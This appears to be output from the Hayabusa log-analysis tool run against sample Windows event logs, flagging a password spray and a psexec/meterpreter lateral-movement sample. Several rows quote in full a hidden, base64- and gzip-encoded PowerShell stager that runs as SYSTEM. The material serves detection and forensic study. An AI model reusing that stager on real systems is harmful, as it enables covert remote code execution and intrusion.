: Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 